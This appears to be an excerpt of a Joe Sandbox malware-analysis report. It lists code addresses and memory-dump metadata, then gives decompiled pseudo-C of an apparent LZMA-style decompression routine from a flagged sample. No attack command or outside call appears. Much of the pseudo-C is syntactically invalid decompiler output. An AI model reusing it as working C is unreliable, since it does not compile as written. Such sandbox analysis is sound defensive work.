                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407120

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                              • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                              • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
